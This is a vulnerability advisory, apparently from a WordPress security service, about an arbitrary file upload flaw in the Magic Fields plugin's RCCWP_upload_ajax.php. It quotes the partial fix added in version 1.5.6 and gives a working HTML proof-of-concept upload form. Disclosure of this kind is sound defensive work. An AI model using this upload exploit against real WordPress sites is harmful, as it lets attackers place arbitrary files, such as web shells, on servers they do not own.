One of the things that we do to keep track of the  plugin vulnerabilities out there is to monitor hacking attempts on our websites. That sometimes leads us to finding what looks to be exploitation of vulnerabilities that a hacker has just discovered. In other cases it shows really old vulnerabilities that hackers are still trying to exploit. We have recently had some requests for a file from the plugin Magic Fields:

 /wp-content/plugins/magic-fields/MF_Constant.php

We looked around for any reports of a vulnerability in this plugin and found nothing. We did see that in version 1.5.6, which was released on June 6, 2011, there was apparently a security issue fixed as the changelog mentions:

• Security bug fixed related with the uploader

In version 1.5.6 code added to the file /RCCWP_upload_ajax.php to check if you were logged in and able at least edit posts, which is capability available to Contributor level users and above, before allowing an upload:

if (!(is_user_logged_in() &&
      (current_user_can('edit_posts') || current_user_can('edit_published_pages'))))
	die(__("Authentication failed!",$mf_domain));

From there we could work out that in some prior versions anyone code upload arbitrary files to the website as shown in the proof of concept below.

With that change though, it is still possible for lower level user to upload arbitrary files, which is a vulnerability and it turns still exist in the version that was available at the time we looked into this vulnerability.

Proof of Concept

The following proof of concept will upload the chosen file to the directory /wp-content/files_mf/.

Make sure to replace “[path to WordPress]” with the location of WordPress:

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/magic-fields/RCCWP_upload_ajax.php" method="post" enctype="multipart/form-data">
<input name="qqfile" type="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>